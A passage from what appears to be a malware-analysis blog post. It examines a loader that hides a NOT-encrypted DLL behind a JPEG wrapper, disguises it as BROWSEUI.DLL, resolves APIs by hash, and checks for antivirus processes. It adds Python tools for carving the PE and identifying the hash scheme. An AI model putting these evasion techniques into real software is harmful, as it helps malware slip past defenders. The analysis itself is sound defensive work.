<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLF_HLzjAKrrs9LjlPGbZv77ou8Ps4CXgU8nYBcOziXk8gy2Kr6Hhn21scDRBxZcPdiscLCXNCmpzyDOCHvmYI7mDu8c1KmTEd1cZm26xaD08FbZgzjoawTAL7zE7LkCb1jEo72q0-/s1600/JPEG_format.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLF_HLzjAKrrs9LjlPGbZv77ou8Ps4CXgU8nYBcOziXk8gy2Kr6Hhn21scDRBxZcPdiscLCXNCmpzyDOCHvmYI7mDu8c1KmTEd1cZm26xaD08FbZgzjoawTAL7zE7LkCb1jEo72q0-/s320/JPEG_format.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 7: JPEG File Interchange Format as seen in the malware’s resource section</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<div style="font-family: Tahoma;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The decryption routine is a simple bitwise NOT of each byte; XOR BYTE PTR [EAX],0FF is an equivalent substitute when decrypting.</span></span></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 15px;"> </span></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqklaiuOPSk8d0g8eorxvGtylY5WcqakijyeqRJ_09u56IlRBXC3GPVB5bpHMQUSMrQHTZ0Z8InIISOGBKIPi1AolqW8Lgz0WLzx0jFW6iOCq7quNuriLiDUMw6xBBrVZncXR93EE/s1600/decrpyt_dll.png" imageanchor="1" style="font-family: Tahoma; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 0mm;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqklaiuOPSk8d0g8eorxvGtylY5WcqakijyeqRJ_09u56IlRBXC3GPVB5bpHMQUSMrQHTZ0Z8InIISOGBKIPi1AolqW8Lgz0WLzx0jFW6iOCq7quNuriLiDUMw6xBBrVZncXR93EE/s320/decrpyt_dll.png" width="320" /></a></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 8: Decrypting the DLL module.</i></span></span></div>
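<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">As an added example (not code from this post or from the malware), the NOT decryption and the carving of the PE image from behind the JPEG wrapper, in Python; the resource bytes below are constructed for the example, not taken from the sample.</span></span></div>

```python
"""Decrypt a NOT-obfuscated resource and carve the PE file out of its JPEG wrapper.

Added example for this post; it is not the malware's own code. The sample resource
below is constructed here: a minimal JFIF header followed by a NOT-encoded PE stub,
mirroring the layout described for resource #200.
"""
import struct
from typing import Optional


def decrypt_not(data: bytes) -> bytes:
    """Bitwise NOT of every byte. For a single byte, NOT is exactly XOR 0xFF, which is
    why XOR BYTE PTR [EAX],0FF works as a substitute; NOT is also its own inverse,
    so the same routine both encrypts and decrypts."""
    return bytes((~b) & 0xFF for b in data)


def find_embedded_pe(buf: bytes) -> Optional[int]:
    """Offset of the first 'MZ' whose e_lfanew points at a PE signature, else None.
    Scanning instead of trusting offset 0 lets the JPEG wrapper (whether it was
    NOT-encoded too or left in cleartext) sit in front of the payload harmlessly."""
    off = 0
    while True:
        off = buf.find(b"MZ", off)
        if off < 0:
            return None
        if off + 0x40 <= len(buf):
            e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
            pe = off + e_lfanew
            # A sane e_lfanew range plus a real signature filters out stray "MZ" bytes.
            if 0x40 <= e_lfanew < 0x1000 and buf[pe:pe + 4] == b"PE\0\0":
                return off
        off += 1


def carve_pe(resource: bytes) -> Optional[bytes]:
    """Decrypt a raw resource and return the embedded PE image, or None if absent."""
    decrypted = decrypt_not(resource)
    off = find_embedded_pe(decrypted)
    return None if off is None else decrypted[off:]


# --- constructed sample data (not bytes from the real sample) ----------------
# SOI marker followed by the APP0 "JFIF" segment: the start of any JFIF file.
JFIF_HEADER = bytes.fromhex("FFD8FFE000104A46494600010100000100010000")


def build_pe_stub() -> bytes:
    """Minimal DOS header + PE signature + i386 machine field; enough for carving."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after DOS header
    return bytes(dos) + b"PE\0\0" + b"\x4C\x01" + b"\0" * 18


# Cleartext JFIF header followed by the NOT-encoded DLL, as in the resource layout.
CONSTRUCTED_RESOURCE = JFIF_HEADER + decrypt_not(build_pe_stub())


if __name__ == "__main__":
    pe = carve_pe(CONSTRUCTED_RESOURCE)
    print("PE found at offset", find_embedded_pe(decrypt_not(CONSTRUCTED_RESOURCE)))
    print("carved", len(pe), "bytes, starting with", pe[:2])
```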
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"> The DLL module is compressed with UPX_LZMA and carries fake file version properties to avoid suspicion, as seen in Figure 9.</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAepbxJ97jcSnkGD18_rslk-QCukTVw9RARgCJa5bNVKthcHjJcs1XpiaGJrlOvOxxsHfotdYwKFmVJpJwupyroZfp3WfbTb5gdkPQFaAdePvvTKaGbcRK7F5jCAbNAmgVDeotD8wU/s1600/fake_browseui_dll.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAepbxJ97jcSnkGD18_rslk-QCukTVw9RARgCJa5bNVKthcHjJcs1XpiaGJrlOvOxxsHfotdYwKFmVJpJwupyroZfp3WfbTb5gdkPQFaAdePvvTKaGbcRK7F5jCAbNAmgVDeotD8wU/s320/fake_browseui_dll.png" width="232" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 9: Fake BROWSEUI.DLL disguised to avoid suspicion.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The malware resolves its APIs by hash: each imported function is stored as a hash, and the export tables of the corresponding DLLs are walked to find the matching address. This technique is common in packers, crypters and malware today. The hashes and the corresponding APIs are listed below:</span></span></div>
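<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">The post does not name the hash function, so here is an added example (not the author's or the malware's code) of how an analyst tests candidate schemes against the hash/name pairs listed below and, once a scheme reproduces them, resolves further hashes back to export names; ROR-13 and CRC32 are assumed candidates only, not confirmed for this sample.</span></span></div>

```python
"""Work out which hashing scheme an API-hash table uses, then resolve hashes to names.

Added example for this post, not the malware's code. The post does not state the
loader's hash function, so the candidate schemes below are assumptions: ROR-13 and
CRC32 are simply common choices an analyst would try first.
"""
import zlib
from typing import Callable, Dict, Iterable, Optional

HashFn = Callable[[bytes], int]


def ror13_hash(name: bytes) -> int:
    """Classic shellcode hash: rotate the 32-bit accumulator right by 13, add the next byte."""
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


def crc32_hash(name: bytes) -> int:
    return zlib.crc32(name) & 0xFFFFFFFF


CANDIDATES: Dict[str, HashFn] = {"ror13": ror13_hash, "crc32": crc32_hash}

# A few (hash, export) pairs copied from the list in this post.
POST_TABLE: Dict[int, str] = {
    0x88444BE9: "CreateToolhelp32Snapshot",
    0x92D66FBA: "Process32FirstW",
    0xD1A588DB: "Process32NextW",
    0xFCAA0AB8: "OpenProcess",
    0xD3E360E9: "GetProcAddress",
}


def score_candidates(table: Dict[int, str], candidates: Dict[str, HashFn]) -> Dict[str, int]:
    """For each candidate, count how many (hash, name) pairs it reproduces exactly."""
    return {
        cname: sum(1 for h, api in table.items() if fn(api.encode("ascii")) == h)
        for cname, fn in candidates.items()
    }


def identify_hash(table: Dict[int, str], candidates: Dict[str, HashFn]) -> Optional[str]:
    """Name of the candidate that reproduces every pair in the table, or None.
    Partial matches are visible through score_candidates but are not accepted here:
    a single collision must not be mistaken for the real scheme."""
    for cname, hits in score_candidates(table, candidates).items():
        if table and hits == len(table):
            return cname
    return None


def resolve_hashes(hashes: Iterable[int], exports: Iterable[str], fn: HashFn) -> Dict[int, Optional[str]]:
    """Once the scheme is known, map raw hashes back to export names; unknown ones map to None."""
    lookup = {fn(name.encode("ascii")): name for name in exports}
    return {h: lookup.get(h) for h in hashes}


if __name__ == "__main__":
    print("candidate scores against the post's table:", score_candidates(POST_TABLE, CANDIDATES))
    print("identified scheme:", identify_hash(POST_TABLE, CANDIDATES))
```

If neither candidate scores full marks against the post's table, the loader uses some other scheme, and the next step is to lift its hashing loop from the disassembly and add it as a further candidate.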
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">kernel32.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x88444BE9: CreateToolhelp32Snapshot</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x92D66FBA: Process32FirstW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD1A588DB: Process32NextW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xFCAA0AB8: OpenProcess</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xAE75A8DB: CreateProcessW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xCF5350C5: GetNativeSystemInfo</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xDCAA4C9F: IsWow64Process</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x4BBFABB8: lstrcmpiW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xA668559E: VirtualQuery</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x4761BB27: VirtualProtect</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD3E360E9: GetProcAddress</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x6B3749B3: MapViewOfFile</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD830E518: UnmapViewOfFile</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x78C93963: FlushInstructionCache</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD83E926D: LoadLibraryW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x19BD1298: FreeLibrary</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x6F8A172D: CreateThread</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xBF464446: WaitForSingleObject</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xAE16A0D4: GetExitCodeThread</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x3242AC18: GetSystemDirectoryW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x479DE84E: CreateFileW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xB67F8157: CreateRemoteThread</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">psapi.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xBCC7C0DA: GetModuleFileNameExW</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">advapi32.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x6012A950: RegOpenKeyExW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xC6151DC4: RegQueryValueExW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xF03A2554: RegCloseKey</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x9C6E14F8: CreateProcessAsUserW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x702B6244: DuplicateTokenEx</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x2EDB7947: OpenProcessToken</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x557DBBB6: LookupPrivilegeValueW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xE763A4A3: AdjustTokenPrivileges</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">version.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xD4DE04DA: GetFileVersionInfoW</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xCEF01246: VerQueryValueW</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">userenv.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x3E692063: CreateEnvironmentBlock</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xAFF5F91F: DestroyEnvironmentBlock</span></span></div>
</li>
</ul>
</div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; font-weight: bold; margin-left: 77pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">ntdll.dll</span><br />
<ul style="margin-bottom: 0mm; margin-top: 0mm;">
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x40C4EC59: ZwQueryInformationProcess</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x5FC5AD65: ZwCreateSection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x1D127D2F: ZwMapViewOfSection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x468B8A32: ZwUnmapViewOfSection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0xDB8CE88C: ZwClose</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x8C6F89E1: ZwQuerySection</span></span></div>
</li>
<li style="font-family: 'Courier New'; font-size: 11pt; margin-left: 10pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt; font-weight: normal;">0x7BCE6E19: ZwQueryAttributesFile</span></span></div>
</li>
</ul>
</div>
</li>
</ul>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><br /></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm 13mm; orphans: 2; text-align: -webkit-auto; text-indent: 13mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">Figure 10 shows a code snippet, complete with comments, of how the malware walks the export table of a specified DLL to resolve the imported APIs it needs:</span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
</div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8WxcgQxgcMetSJetJXYII4FIRkj8XLTiS637QD3t_ndal9B0W1P_1VR8f4hLCR0CLm7uqlNGjQQSxVCDoKPczuKZSq3cCHH4KxHvfyUEPSfHv5NFy7PHKtozaBnCeTU3tL86jjwqF/s1600/malware_api_traverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8WxcgQxgcMetSJetJXYII4FIRkj8XLTiS637QD3t_ndal9B0W1P_1VR8f4hLCR0CLm7uqlNGjQQSxVCDoKPczuKZSq3cCHH4KxHvfyUEPSfHv5NFy7PHKtozaBnCeTU3tL86jjwqF/s320/malware_api_traverse.png" width="320" /></a></div>
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i>Figure 10: Malware API traversing 101.</i></span></span></div>
<div align="center" style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;"><i><br /></i></span></span></div>
<div style="font-family: Tahoma; line-height: 14px; margin: 0mm 0mm 0.35mm; orphans: 2; text-align: -webkit-auto; text-indent: 0mm; widows: 2;">
<span style="color: #010101; font-family: Calibri;"><span style="font-size: 11pt;">It then creates a system snapshot of the running processes in memory and checks whether any security-software processes are running. It monitors the following:</span></span></div>
<ul style="font-family: Tahoma; margin-bottom: 0mm; margin-top: 0mm; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">avp.exe - Kaspersky</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">Mcshield.exe - McAfee</span></div>
</li>
<li style="color: #010101; font-family: Symbol; font-size: 11pt; margin-left: 59pt; margin-right: 0pt; padding-left: 0pt;"><div style="margin-bottom: 1pt; margin-top: 0pt;">
<span style="color: #010101; font-family: Calibri;">avguard.exe - Avira</span></div>
</li>
